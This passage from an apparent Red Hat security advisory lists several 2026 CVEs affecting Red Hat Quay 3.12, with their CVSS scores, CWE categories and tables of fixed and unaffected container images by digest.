Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64	—	Workaround

Threats

Impact Important

CVE-2026-39892

7.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE-131 - Incorrect Calculation of Buffer Size

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix Workaround

Known not affected 24 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64	—	Workaround

Threats

Impact Important

CVE-2026-40192

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-409 - Improper Handling of Highly Compressed Data (Data Amplification)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix Workaround

Known not affected 24 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64	—	Workaround

Threats

Impact Important

CVE-2026-40895

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-212 - Improper Removal of Sensitive Information Before Storage or Transfer

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix

Known not affected 24 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64		—

Threats

Impact Important

CVE-2026-42033

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix

Known not affected 24 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x		—
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64		—

Threats

Impact Important

CVE-2026-42035

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x	—	Vendor Fix fix Workaround

Known not affected 24 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64	—	Workaround
